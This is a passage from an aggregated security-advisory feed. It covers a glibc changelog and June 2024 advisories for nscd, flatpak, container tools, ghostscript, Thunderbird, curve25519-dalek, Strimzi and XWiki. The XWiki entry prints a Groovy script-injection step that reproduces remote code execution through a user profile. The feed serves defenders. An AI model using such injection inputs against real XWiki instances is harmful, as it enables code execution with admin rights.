- upstream commit 2bce01ebbaf8db52ba4a5635eb5744f989cdbf69 - aarch64: Improve strcmp unaligned performance
- upstream commit 84c94d2fd90d84ae7e67657ee8e22c2d1b796f63 - aarch64: Use the L() macro for labels in memcmp
- upstream commit 6ca24c43481e2c93a6eec362b04c3e77a35b28e3 - aarch64/strcmp: fix misaligned loop jump target
- upstream commit 30a81dae5b752f8aa5f96e7f7c341ec57cba3585 - aarch64: Optimized memcmp for medium to large sizes
- upstream commit 4e54d918630ea53e29dd70d3bdffcb00d29ed3d4 - aarch64: Fix branch target to loop16
- upstream commit 7108f1f944792ac68332967015d5e6418c5ccc88 - aarch64: Improve strncmp for mutually misaligned inputs
- upstream commit d46f84de745db8f3f06a37048261f4e5ceacf0a3 - aarch64/strncmp: Unbreak builds with old binutils
- upstream commit b47c3e7637efb77818cbef55dcd0ed1f0ea0ddf1 - aarch64/strncmp: Use lsr instead of mov+lsr Orabug: <28077661>
- upstream commit 3a7ac8a0f596bb73093212cd1109c1413777e1f8 - Remove bp-start.h and INIT_ARGV_and_ENVIRON.
- upstream commit 10ad46bc6526edc5c7afcc57112da96917ff3629 - Consolidate valloc/pvalloc code.
- upstream commit 520d437b9455560d099fe6bd9664be1f9f76868b - Fix build warnings from systemtap probes in non-systemtap configurations
- upstream commit f3eeb3fc560ccc4ce51dc605e4703c5016b07244 - Replace malloc force_reg by atomic_forced_read.
- upstream commit 6c8dbf00f536d78b1937b5af6f57be47fd376344 - Reformat malloc to gnu style.
- upstream commit bdfe308a166b433a841d5c9ae256560c18bce640 - Remove THREAD_STATS.
- upstream commit e0db65176fa88b9497cbd6362b24e3225382bfb6 - Clean up __exit_thread.
- upstream commit 79520f4bd611602f5bdb2b50979cf75bb5ac2968 - Use existing makefile variables for dependencies on
- upstream commit 75f11331f98ebf3873e887a683add944a1aec0fd - correct alignment of TLS_TCB_ALIGN (BZ #16796)
- upstream commit 94c5a52a841f807a23dbdd19a5ddeb505cc1d543 - Consolidate arena_lookup and arena_lock into a single arena_get
- upstream commit c26efef9798914e208329c0e8c3c73bb1135d9e3 - malloc: Consistently apply trim_threshold to all heaps [BZ #17195]
- upstream commit 92a9b22d70b85b7edd0484db8bf2465a969fb09e - Drop unused first argument from arena_get2
- upstream commit c3b9ef8dfc83e9d17da5adc73709d2f7dfbbaf13 - Do not use the main arena in retry path if it is corrupt
- upstream commit 90b2517115a56ca9f5625f3e16c2629deeac55a9 - include/stap-probe.h: Fix formatting.
- upstream commit 6782806d8f6664d87d17bb30f8ce4e0c7c931e17 - malloc: Rewrite with explicit TLS access using __thread
- upstream commit a62719ba90e2fa1728890ae7dc8df9e32a622e7b - malloc: Prevent arena free_list from turning cyclic [BZ #19048]
- upstream commit 730bbab2c39dd615c31c924041b4d16d7f107ae0 - Mark internal unistd functions hidden in ld.so
- upstream commit cbb47fa1c6476af73f393a81cd62fc926e1b8f6e - malloc: Manual part of conversion to __libc_lock
- upstream commit e33a23fbe8c2dba04fe05678c584d3efcb6c9951 - Add INTERNAL_SYSCALL_CALL
- upstream commit be7991c0705e35b4d70a419d117addcd6c627319 - Static inline functions for mallopt helpers
- upstream commit afcf3cd8ebff8fed79238a2d1b95338c4606b1ee - New internal function __access_noerrno
- upstream commit 67e58f39412ecd4467034761f3f074283c90f3c8 - Add framework for tunables
- upstream commit 3c589b1a8a4401e258ba23a03fcbcc79b82393ab - tunables: Use correct unused attribute (fixed build error in 67e58f)
- upstream commit 9dd409a5f4a7a053cc962f8371dad0fe5cc22597 - Initialize tunable list with the GLIBC_TUNABLES environment variable
- upstream commit 6765d5d34d126b26d55e2d73dac4dfec5e6d6241 - Enhance --enable-tunables to select tunables frontend at build time
- upstream commit b31b4d6ae50b0d332207754327598fdce5b51015 - User manual documentation for tunables
- upstream commit 34a63b097335d3411080b5b6e5b164ab36563847 - malloc: Run tunables tests only if tunables are enabled
- upstream commit d054a81ab3a2515a45d28e6c26d2b190ff74e8ec - tunables: Avoid getenv calls and disable glibc.malloc.check by default
- upstream commit 41389c40499a083c59e68ba281ec87be567f2871 - Fix environment traversal when an envvar value is empty
- upstream commit f3bef6a748097d02d196df247f7b292c7b83744c - * elf/dl-tunables.c (tunable_set_val_if_valid_range): Split into ...
- upstream commit 8b9e9c3c0bae497ad5e2d0ae2f333f62feddcc12 - tunables: Fix environment variable processing for setuid binaries (bz #21073)
- upstream commit ed8d5ffd0a14e84298a15ae2ec9b799010166b28 - Drop GLIBC_TUNABLES for setxid programs when tunables is disabled (bz #21073)
- upstream commit 53aa04a86c10f49b7481e73d2ca045ecd6ed2df7 - tunables: Fail tests correctly when setgid does not work
- upstream commit 43ce02c6ec27d4e2d8f0ae327bbbeaba84060964 - Fix typo in manual
- upstream commit 8cbc826c37c0221ada65a7a622fe079b4e89a4b0 - Fix getting tunable values on big-endian (BZ #21109
- upstream commit 1c1243b6fc33c029488add276e56570a07803bfd - Ignore and remove LD_HWCAP_MASK for AT_SECURE programs (bug #21209)
- upstream commit 65eff7fbdbddad8c1f9af7cb48cd3b5dca3c5c9d - Update old tunables framework document/script.
- upstream commit 17284d650ebe5c736c9730ee16401008f26128c3 - tunables: Make tunable_list relro
- upstream commit d13103074ab5c7614eeb94f88a61803ed8f3e878 - tunables: Specify a default value for tunables
- upstream commit ad2f35cb396d24391150675fb55311c98d1e1592 - tunables: Add support for tunables of uint64_t type
- upstream commit ce79740bdbccea312df6cfcf70689efb57792fc9 - Reduce value of LD_HWCAP_MASK for tst-env-setuid test case
- upstream commit ee8015b9ea084d5727ce477fdd8d935f1de7f7f6 - Support dl-tunables.list in subdirectories
- upstream commit 81efada5287c3215307623e57d3bbbeefa0c1250 - Make __tunables_init hidden and avoid PLT
- upstream commit 4158ba082c641f407009363b186b4c85f8a01a35 - Delay initialization of CPU features struct in static binaries
- upstream commit 44330b6d32904fdc8b6835a112e0ba0aee9f4ef3 - tunables: Clean up hooks to get and set tunables
- upstream commit ea9b0ecbf0e7b6e8281047624efbe1b2cbb6d487 - tunables: Add LD_HWCAP_MASK to tunables
- upstream commit ff08fc59e36e02074eba8ab39b0d9001363970f0 - tunables: Use glibc.tune.hwcap_mask tunable instead of _dl_hwcap_mask
- upstream commit f82e9672ad89ea1ef40bbe1af71478e255e87c5e - aarch64: Allow overriding HWCAP_CPUID feature check using HWCAP_MASK
- upstream commit 511c5a1087991108118c6e9c9546e83e992bf39c - Make LD_HWCAP_MASK usable for static binaries
- upstream commit ea01a4da219011f4a4db97eef3c5bfc2f6e8fc6b - aarch64: Add hwcap string routines
- upstream commit 6c85cc2852367ea2db91ff6a1fc0f6fc0653788d - aarch64: Fix undefined behavior in _dl_procinfo
- upstream commit 2c0b90ab443abc967cbf75add4f7fde84978cb95 - Enable tunables by default
- upstream commit 95a73392580761abc62fc9b1386d232cd55878e9 - tunables: Use direct syscall for access (BZ#21744)
- upstream commit a4de0a9008d6f15e1509c9818ba6e50d78bb83f3 - Fix gen-tunables.awk to work with older awk Orabug: <28121777>
- upstream commit ddcf6798d35beca3c4eec80ea448b57fd45558f4 - Replace C implementation of bzero with direct call to memset.
- upstream commit af96be34825586536ebcfbf5c675e795ddd3c8fa - Replace C implementation of bcopy with a direct call to memmove.
- upstream commit 6a2c695266fab34cc057256d1b33d2268183f00e - aarch64: Thunderx specific memcpy and memmove
- upstream commit 512d245bc30cca893db6979f42f058e734f345c3 - Add HWCAP_ macros from Linux 4.12 to AArch64 bits/hwcap.h.
- upstream commit 738a9914a066a31750925543a8c6d2661bd61345 - benchtests: Print string array elements, int and uint in json
- upstream commit 5ee1e3cebc47495a36d17a0066c241978ca6f502 - benchtests: Make memcpy benchmarks print results in json
- upstream commit 25d5247277760e669a69618ce99ce6065e92362c - benchtests: New script to parse memcpy results
- upstream commit ab85da15301c552e3ea4577a6432aa028bee9295 - aarch64: Call all string function implementations in tests
- upstream commit 28cfa3a48e59f9c6b9bc25a003a4ede435841382 - tunables, aarch64: New tunable to override cpu
- upstream commit 47ea614b9afcdaef80e09d58afcdad4f96ba3f15 - fix typo
- upstream commit 82e06600505cc26810d263a964d9eca6f3cdfe91 - [AArch64] Update dl-procinfo for new HWCAP flags in Linux 4.12
- upstream commit 36ada5f681d86d4abe7b3b47d653d69e5ab2a6fd - aarch64: Optimized memcpy for Qualcomm Falkor processor
- upstream commit 61c982910da9b60f7ac48eb1caaac1f4b013dbb1 - benchtests: Remove verification runs from benchmark tests
- upstream commit 86c6519ee77d241575653206f33dbe1d4c8436cf - benchtests: Print json in memmove benchmark
- upstream 9eee633b68649c94b2404f65d5c9a00c3ed1f068 - Change argument type passed to ifunc resolvers
- upstream commit 9c9ec58197d1e18db6f7b39f7dc08b0f5f61df4e - Add thunderx2t99 and thunderx2t99p1 CPU names to tunables list
- upstream commit f00bce744e12996a30b7ac5851b001b1dd7beaa9 - Fix glibc.tune.cpu tunable handling
- upstream commit 29c933fb35b7bf872f57dc6977c879832983ab6c - benchtests: Make memset benchmarks print json
- upstream commit 503c92c37a95f769762e65aff9383b302178c2bc - benchtests: Reallocate buffers for memset
- upstream commit dd5bc7f1b385b29d0f90aefe4d9756b35011709b - aarch64: Optimized implementation of memmove for Qualcomm Falkor
- upstream commit edbbc86c3a6624dcc0316a4cd78fe1adfb383405 - * sysdeps/aarch64/bzero.S (__bzero): Remove.
- upstream commit 4d7632ff687dc60fb9ed38bae682d395017b61a8 - benchtests: Fix walking sizes and directions for *-walk benchmarks
- upstream commit eb332f9feb7637eeefed037a683d2a6130d058b1 - benchtests: Bump start size since smaller sizes are noisy
- upstream commit 5a67c4fa010abb27e704aa4ea3896f3aa2b39ed7 - aarch64: Optimized memset for falkor
- upstream commit 5f1603c331d9e2194170762b7e5e80a5571e4b4e - Convert strcmp benchmark output to json format
- upstream commit 4e00196912e63bd44f9a62a88a0f5c5fde25ad86 - aarch64: fix memset with --disable-multi-arch
- upstream commit 3dfcbfa1a4bfa39344e8d945ed1bd697c4c9fe96 - benchtests: Reallocate buffers for every test run
- upstream commit 96e6a7167e127d5e65000f2724e074f1c026e1f1 - benchtests: Make bench-memcmp print json
- upstream commit e9537dddc7c7c7b60b55ed845542c8d586164488 Orabug: <28121801>
- upstream commit 9dbebe1a67bbedfcb39c6b739f15bc639e8d40a2 - [AArch64] Save and restore q0-q7 on entry to dynamic linker.
- upstream commit 1670e207c57513da84462c2a018f01653e7d1cc6 - aarch64: Rely on syscalls preserving registers
- upstream commit f940b96522d6ac67915186dfaa71b43f3e7f5404 - [AArch64] Add optimized strchr.
- upstream commit be9d4ccc7fe62751db1a5fdcb31958561dbbda9a - [AArch64] Add optimized strchrnul.
- upstream commit 80085defb83e4f2ce098c8bc00c82d1e14998c71 - [AArch64] End frame record chain correctly. [??Bug 17522], release 2.21
- upstream commit aa76a5c7010e98c737d79f37aa6ae668f60f7a00 - [AArch64] Fix strchrnul clobbering v15
- upstream commit ec582ca0f30c963a1c27f405b6732ca8507271d5 - AArch64 optimized implementation of strrchr.
- upstream commit dc400d7b735c47086a001ed051723e376230cf01 - AArch64: Optimized implementations of strcpy and stpcpy.
- upstream commit d3496c9f4f27d3009b71be87f6108b4fed7314bd - Improve generic strcspn performance
- upstream commit 91f3b75f47c9eca3299098c3dcc2f5d9dad320b1 - Improve generic strspn performance
- upstream commit 282b71f07eb5e24ddf1308f92c37cb42f7c7d86b - Improve generic strpbrk performance
- upstream commit 2e51bc3813ca3fe72fd197d08d79496e46669f43 - Use PTR_ALIGN_DOWN on strcspn and strspn
- upstream commit f6a191a6ee0313d61dffa70d86b033c5a598f907 - Consolidate Linux read syscall - Fixes BZ#21428
- upstream commit ed0257f7d3378ec4a72e297f0dcba5159f2dd138 - [AArch64] Adjust elf_machine_dynamic to use _GLOBAL_OFFSET_TABLE_
- upstream commit e535ce250143b9c1600b306911710c0de73e2a5e - [ARM] add missing -funwind-tables to test case (bug 19529)
- upstream commit a68ba2f3cd3cbe32c1f31e13c20ed13487727b32 - [AARCH64] Rewrite elf_machine_load_address using _DYNAMIC symbol
- upstream commit db9bab09a51188bf57afeb47040ce6837b878367 - Document cache information sysconf variables
- upstream commit a2e0a7f12ba57a49d1380c7ba1ff4b1f51d67347 - aarch64: Document _SC_LEVEL1_DCACHE_LINESIZE caveat
- upstream commit 659ca267360e1c1f64eea9205bb81cb5e9049908 - aarch64: optimize _dl_tlsdesc_dynamic fast path
- upstream commit 3d1d79283e6de4f7c434cb67fb53a4fd28359669 - aarch64: fix static pie enabled libc when main is in a shared library
- upstream commit c9e613a728b9eaf0713b5a5970bb9ad4984fc688 - Add NT_ARM_SVE to elf.h Orabug: <28336148>
- Rebase of the aarch64 OL 7.4 patches.
- Enable ifunc support. (Egeyar Bagcioglu 2.17-196.0.2.el7_4.2) Orabug: <26894372>
[2.17-326.3]
- nscd: Fix timeout type in netgroup cache (RHEL-34263)
[2.17-326.2]
- nscd: Do not use sendfile for the netgroup cache
- nscd: Use-after-free in netgroup cache
- CVE-2021-27645: nscd: double-free in netgroup cache
- CVE-2024-33599: nscd: buffer overflow in netgroup cache (RHEL-34263)
- CVE-2024-33600: nscd: null pointer dereferences in netgroup cache
- CVE-2024-33601: nscd: crash on out-of-memory condition
- CVE-2024-33602: nscd: memory corruption with NSS netgroup modules
[2.17-326.1]
- CVE-2024-2961: Out of bounds write in iconv conversion to ISO-2022-CN-EXT (RHEL-31803)
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12442

18.06.2024 03:00:00 | oraclelinux | [ELSA-2024-3980] flatpak security update (important)
[1.0.9-13]
- Fix CVE-2024-32462
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3980

18.06.2024 03:00:00 | oraclelinux | [ELSA-2024-3968] container-tools:ol8 bug fix and enhancement update (moderate)
aardvark-dns
[2:1.10.0-1]
- update to https://github.com/containers/aardvark-dns/releases/tag/v1.10.0
- Related: Jira:RHEL-2110
[2:1.9.0-1]
- update to https://github.com/containers/aardvark-dns/releases/tag/v1.9.0
- Related: Jira:RHEL-2110
[2:1.8.0-1]
- update to https://github.com/containers/aardvark-dns/releases/tag/v1.8.0
- Related: Jira:RHEL-2110
buildah
[2:1.33.7-2]
- update to the latest content of https://github.com/containers/buildah/tree/release-1.33 (https://github.com/containers/buildah/commit/997beea)
- Resolves: RHEL-28725
cockpit-podman
[84.1-1]
- update to https://github.com/cockpit-project/cockpit-podman/releases/tag/84.1
- Related: Jira:RHEL-25557
[84-1]
- update to https://github.com/cockpit-project/cockpit-podman/releases/tag/84
- Related: Jira:RHEL-2110
[83-1]
- update to https://github.com/cockpit-project/cockpit-podman/releases/tag/83
- Related: Jira:RHEL-2110
[82-1]
- update to https://github.com/cockpit-project/cockpit-podman/releases/tag/82
- Related: Jira:RHEL-2110
[81-1]
- update to https://github.com/cockpit-project/cockpit-podman/releases/tag/81
- Related: Jira:RHEL-2110
[80-1]
- update to https://github.com/cockpit-project/cockpit-podman/releases/tag/80
- Related: Jira:RHEL-2110
[79-1]
- update to https://github.com/cockpit-project/cockpit-podman/releases/tag/79
- Related: Jira:RHEL-2110
[78-1]
- update to https://github.com/cockpit-project/cockpit-podman/releases/tag/78
- Related: Jira:RHEL-2110
[77-1]
- update to https://github.com/cockpit-project/cockpit-podman/releases/tag/77
- Related: Jira:RHEL-2110
[75-1]
- update to https://github.com/cockpit-project/cockpit-podman/releases/tag/75
- Related: #2176055
conmon
[3:2.1.10-1]
- update to https://github.com/containers/conmon/releases/tag/v2.1.10
- Related: Jira:RHEL-2110
[3:2.1.8-1]
- update to https://github.com/containers/conmon/releases/tag/v2.1.8
- Related: #2176055
containernetworking-plugins
[1:1.4.0-2]
- rebuild
- Resolves: RHEL-18390
[1:1.4.0-1]
- update to https://github.com/containernetworking/plugins/releases/tag/v1.4.0
- Related: Jira:RHEL-2110
containers-common
[2:1-81.0.1]
- Updated removed references [Orabug: 33473101] (Alex Burmashev)
- Adjust registries.conf (Nikita Gerasimov)
- remove references to RedHat registry (Nikita Gerasimov)
[2:1-81]
- Update shortnames from Pyxis
- Related: Jira:RHEL-2110
[2:1-80]
- bump release to preserve upgrade path
- Resolves: Jira:RHEL-12277
container-selinux
[2:2.229.0-2]
- remove watch statements properly for RHEL8 and lower
- Related: Jira:RHEL-2110
[2:2.229.0-1]
- update to https://github.com/containers/container-selinux/releases/tag/v2.229.0
- Related: Jira:RHEL-2110
[2:2.228.1-1]
- update to https://github.com/containers/container-selinux/releases/tag/v2.228.1
- Related: Jira:RHEL-2110
[2:2.228.0-1]
- update to https://github.com/containers/container-selinux/releases/tag/v2.228.0
- Related: Jira:RHEL-2110
[2:2.227.0-1]
- update to https://github.com/containers/container-selinux/releases/tag/v2.227.0
- Related: Jira:RHEL-2110
[2:2.226.0-1]
- update to https://github.com/containers/container-selinux/releases/tag/v2.226.0
- remove dependency on policycoreutils-python-utils as it pulls in python
- Related: Jira:RHEL-2110
[2:2.224.0-1]
- update to https://github.com/containers/container-selinux/releases/tag/v2.224.0
- Related: Jira:RHEL-2110
[2:2.222.0-1]
- update to https://github.com/containers/container-selinux/releases/tag/v2.222.0
- Related: Jira:RHEL-2110
criu
[3.18-5]
- rebuild to preserve upgrade path
- Related: RHEL-32671
[3.18-4]
- switch to egg-info on 8.9
- Related: #2176055
[3.18-3]
- remove --progress-bar option
- Related: #2176055
[3.18-2]
- update to 3.18
- Related: #2176055
[3.17-1]
- update to 3.17
- Resolves: #2175794
crun
[1.14.3-2]
- remove BR libgcrypt-devel, no longer needed
- Related: Jira:RHEL-2110
[1.14.3-1]
- update to https://github.com/containers/crun/releases/tag/1.14.3
- Related: Jira:RHEL-2110
[1.14.1-1]
- update to https://github.com/containers/crun/releases/tag/1.14.1
- Related: Jira:RHEL-2110
[1.14-1]
- update to https://github.com/containers/crun/releases/tag/1.14
- Related: Jira:RHEL-2110
[1.13-1]
- update to https://github.com/containers/crun/releases/tag/1.13
- Related: Jira:RHEL-2110
[1.12-1]
- update to https://github.com/containers/crun/releases/tag/1.12
- Related: Jira:RHEL-2110
[1.11.2-1]
- update to https://github.com/containers/crun/releases/tag/1.11.2
- Related: Jira:RHEL-2110
[1.11.1-1]
- update to https://github.com/containers/crun/releases/tag/1.11.1
- Related: Jira:RHEL-2110
[1.11-1]
- update to https://github.com/containers/crun/releases/tag/1.11
- Related: Jira:RHEL-2110
[1.9.2-1]
- update to https://github.com/containers/crun/releases/tag/1.9.2
- Related: Jira:RHEL-2110
[1.9.1-1]
- update to https://github.com/containers/crun/releases/tag/1.9.1
- Related: Jira:RHEL-2110
[1.9-1]
- update to https://github.com/containers/crun/releases/tag/1.9
- Related: Jira:RHEL-2110
fuse-overlayfs
[1.13-1]
- update to https://github.com/containers/fuse-overlayfs/releases/tag/v1.13
- Related: Jira:RHEL-2110
libslirp
[4.4.0-2]
- rebuild to preserve upgrade path 8.9 -> 8.10
- Related: RHEL-32671
netavark
[2:1.10.3-1]
- update to https://github.com/containers/netavark/releases/tag/v1.10.3
- Related: Jira:RHEL-2110
[2:1.10.2-1]
- update to https://github.com/containers/netavark/releases/tag/v1.10.2
- Related: Jira:RHEL-2110
[2:1.10.1-1]
- update to https://github.com/containers/netavark/releases/tag/v1.10.1
- Related: Jira:RHEL-2110
[2:1.10.0-1]
- update to https://github.com/containers/netavark/releases/tag/v1.10.0
- Related: Jira:RHEL-2110
[2:1.9.0-1]
- update to https://github.com/containers/netavark/releases/tag/v1.9.0
- Related: Jira:RHEL-2110
[2:1.8.0-2]
- fix directory for systemd units
- Related: Jira:RHEL-2110
[2:1.8.0-1]
- update to https://github.com/containers/netavark/releases/tag/v1.8.0
- Related: Jira:RHEL-2110
oci-seccomp-bpf-hook
[1.2.10-1]
- update to https://github.com/containers/oci-seccomp-bpf-hook/releases/tag/v1.2.10
- Related: Jira:RHEL-2110
podman
[4:4.9.4-3.0.1]
- Add devices on container startup, not on creation
[4:4.9.4-3]
- BR: /usr/bin/man
- Related: RHEL-28727
[4:4.9.4-2]
- update to the latest content of https://github.com/containers/podman/tree/v4.9-rhel (https://github.com/containers/podman/commit/6464b2c)
- Resolves: RHEL-28727
python-podman
[4.9.0-1]
- update to https://github.com/containers/podman-py/releases/tag/v4.9.0
- Related: Jira:RHEL-2110
[4.8.2-1]
- update to https://github.com/containers/podman-py/releases/tag/v4.8.2
- Related: Jira:RHEL-2110
[4.8.0.post1-1]
- update to https://github.com/containers/podman-py/releases/tag/v4.8.0.post1
- Related: Jira:RHEL-2110
[4.7.0-1]
- update to https://github.com/containers/podman-py/releases/tag/v4.7.0
- Related: Jira:RHEL-2110
runc
skopeo
[2:1.14.3-2]
- update to the latest content of https://github.com/containers/skopeo/tree/release-1.14 (https://github.com/containers/skopeo/commit/5f2b9af)
- Resolves: RHEL-28728
[2:1.14.3-1]
- update to the latest content of https://github.com/containers/skopeo/tree/release-1.14 (https://github.com/containers/skopeo/commit/4a2bc3a)
- Resolves: RHEL-28226
slirp4netns
[1.2.3-1]
- update to https://github.com/rootless-containers/slirp4netns/releases/tag/v1.2.3
- Related: Jira:RHEL-2110
[1.2.2-1]
- update to https://github.com/rootless-containers/slirp4netns/releases/tag/v1.2.2
- Related: Jira:RHEL-2110
udica
[0.2.6-21]
- bump release to preserve update path
- Resolves: RHEL-32671
[0.2.6-20]
- bump release to preserve update path
- Related: #2139052
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3968

19.06.2024 03:10:32 | rustsec | [RUSTSEC-2024-0344] Timing variability in `curve25519-dalek`'s `Scalar29::sub`/`Scalar52::sub`
Timing variability of any kind is problematic when working with potentially secret values such as elliptic curve scalars, and such issues can potentially leak private keys and other secrets. Such a problem was recently discovered in `curve25519-dalek`.
The `Scalar29::sub` (32-bit) and `Scalar52::sub` (64-bit) functions contained usage of a mask value inside a loop where LLVM saw an opportunity to insert a branch instruction (`jns` on x86) to conditionally bypass this code section when the mask value is set to zero as can be seen in godbolt:
- 32-bit (see L106): <https://godbolt.org/z/zvaWxzvqv>
- 64-bit (see L48): <https://godbolt.org/z/PczYj7Pda>
A similar problem was recently discovered in the Kyber reference implementation: <https://groups.google.com/a/list.nist.gov/g/pqc-forum/c/hqbtIGFKIpU/m/cnE3pbueBgAJ>
As discussed on that thread, one portable solution, which is also used in this PR, is to introduce a volatile read as an optimization barrier, which prevents the compiler from optimizing it away.
The fix can be validated in godbolt here:
- 32-bit: <https://godbolt.org/z/jc9j7eb8E>
- 64-bit: <https://godbolt.org/z/x8d46Yfah>
The problem was discovered and the solution independently verified by Alexander Wagner <alexander.wagner@aisec.fraunhofer.de> and Lea Themint <lea.thiemt@tum.de> using their DATA tool: <https://github.com/Fraunhofer-AISEC/DATA>
https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0344

18.06.2024 19:34:18 | maven | [MAVEN:GHSA-Q2XX-F8R3-9MG5] STRIMZI incorrect access control (high)
Incorrect access control in the Kafka Connect REST API in the STRIMZI Project 0.41.0 and earlier allows an attacker to deny the service for Kafka Mirroring, potentially mirror the topics' content to his Kafka cluster via a malicious connector (bypassing Kafka ACL if it exists), and potentially steal Kafka SASL credentials, by querying the MirrorMaker Kafka REST API.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-Q2XX-F8R3-9MG5

20.06.2024 19:19:14 | maven | [MAVEN:GHSA-J584-J2VJ-3F93] XWiki Platform allows remote code execution from user account (critical)
### Impact
When an admin disables a user account, the user's profile is executed with the admin's rights. This allows a user to place malicious code in the user profile before getting an admin to disable the user account.
To reproduce, as a user without script nor programming rights, edit the about section of your user profile and add `{{groovy}}services.logging.getLogger("attacker").error("Hello from Groovy!"){{/groovy}}`.
As an admin, go to the user profile and click the "Disable this account" button. Then, reload the page. If the logs show `attacker - Hello from Groovy!` then the instance is vulnerable.
### Patches
This has been patched in XWiki 14.10.21, 15.5.5, 15.10.6 and 16.0.0.
### Workarounds
We're not aware of any workaround except upgrading.
### References
* https://jira.xwiki.org/browse/XWIKI-21611
* https://github.com/xwiki/xwiki-platform/commit/f89c8f47fad6e5cc7e68c69a7e0acde07f5eed5a
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-J584-J2VJ-3F93

20.06.2024 19:22:34 | maven | [MAVEN:GHSA-9442-GM4V-R222] Undertow's url-encoded request path information can be broken on ajp-listener (high)
A vulnerability was found in Undertow. URL-encoded request path information can be broken for concurrent requests on ajp-listener, causing the wrong path to be processed and resulting in a possible denial of service.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9442-GM4V-R222

20.06.2024 09:07:08 | ubuntu | [USN-6842-1] gdb vulnerabilities (medium)
gdb could be made to crash if it opened a specially crafted file.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6842-1

20.06.2024 14:36:23 | almalinux | [ALSA-2024:4000] ghostscript security update (important)
ghostscript security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4000

20.06.2024 14:33:41 | almalinux | [ALSA-2024:3999] ghostscript security update (important)
ghostscript security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3999

20.06.2024 16:53:09 | almalinux | [ALSA-2024:4002] thunderbird security update (important)
thunderbird security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4002

20.06.2024 03:00:00 | debian | [DSA-5717-1] php8.2 (medium)
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5717-1

20.06.2024 03:00:00 | oraclelinux | [ELSA-2024-3999] ghostscript security update (important)
[9.54.0-16]
- RHEL-39110 fix regression discovered in OPVP device
[9.54.0-15]
- RHEL-39110 CVE-2024-33871 ghostscript: OPVP device arbitrary code execution via custom Driver library
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3999

20.06.2024 03:00:00 | oraclelinux | [ELSA-2024-4000] ghostscript security update (important)
[9.27-13]
- CVE-2024-33871 ghostscript: OPVP device arbitrary code execution via custom Driver library
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4000

20.06.2024 03:00:00 | oraclelinux | [ELSA-2024-4002] thunderbird security update (important)
[115.12.1-1.0.1]
- Add Oracle prefs
[115.12.1]
- Add OpenELA debranding
[115.12.1-1]
- Update to 115.12.1 build1
[115.12.0-2]
- Update to 115.12.0 build2
[115.12.0-1]
- Update to 115.12.0 build1
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4002

20.06.2024 03:00:00 | oraclelinux | [ELSA-2024-4016] thunderbird security update (important)
[115.12.1-1.0.1]
- Replaced thunderbird-redhat-default-prefs.js with thunderbird-oracle-default-prefs.js
- Enabled aarch64 build
[115.12.1-1]
- Update to 115.12.1 build1
[115.12.0-2]
- Update to 115.12.0 build2
[115.12.0-1]
- Update to 115.12.0 build1
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4016
20.06.2024 03:00:00redhat[RHSA-2024:4000] ghostscript security update (important)The Ghostscript suite contains utilities for rendering PostScript and PDF documents. Ghostscript translates PostScript code to common bitmap formats so that the code can be displayed or printed.Security Fix(es):* ghostscript: OPVP device arbitrary code execution via custom Driver library (CVE-2024-33871)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4000
20.06.2024 03:00:00redhat[RHSA-2024:3999] ghostscript security update (important)The Ghostscript suite contains utilities for rendering PostScript and PDF documents. Ghostscript translates PostScript code to common bitmap formats so that the code can be displayed or printed.Security Fix(es):* ghostscript: OPVP device arbitrary code execution via custom Driver library (CVE-2024-33871)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3999
20.06.2024 03:00:00redhat[RHSA-2024:4016] thunderbird security update (important)Mozilla Thunderbird is a standalone mail and newsgroup client.This update upgrades Thunderbird to version 115.12.1.Security Fix(es):* thunderbird: Use-after-free in networking (CVE-2024-5702)* thunderbird: Use-after-free in JavaScript object transplant (CVE-2024-5688)* thunderbird: External protocol handlers leaked by timing attack (CVE-2024-5690)* thunderbird: Sandboxed iframes were able to bypass sandbox restrictions to open a new window (CVE-2024-5691)* thunderbird: Cross-Origin Image leak via Offscreen Canvas (CVE-2024-5693)* thunderbird: Memory Corruption in Text Fragments (CVE-2024-5696)* thunderbird: Memory safety bugs fixed in Firefox 127, Firefox ESR 115.12, and Thunderbird 115.12 (CVE-2024-5700)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4016
20.06.2024 03:00:00redhat[RHSA-2024:4036] thunderbird security update (important)Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 115.12.1. Security Fix(es): * thunderbird: Use-after-free in networking (CVE-2024-5702) * thunderbird: Use-after-free in JavaScript object transplant (CVE-2024-5688) * thunderbird: External protocol handlers leaked by timing attack (CVE-2024-5690) * thunderbird: Sandboxed iframes were able to bypass sandbox restrictions to open a new window (CVE-2024-5691) * thunderbird: Cross-Origin Image leak via Offscreen Canvas (CVE-2024-5693) * thunderbird: Memory Corruption in Text Fragments (CVE-2024-5696) * thunderbird: Memory safety bugs fixed in Firefox 127, Firefox ESR 115.12, and Thunderbird 115.12 (CVE-2024-5700) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4036
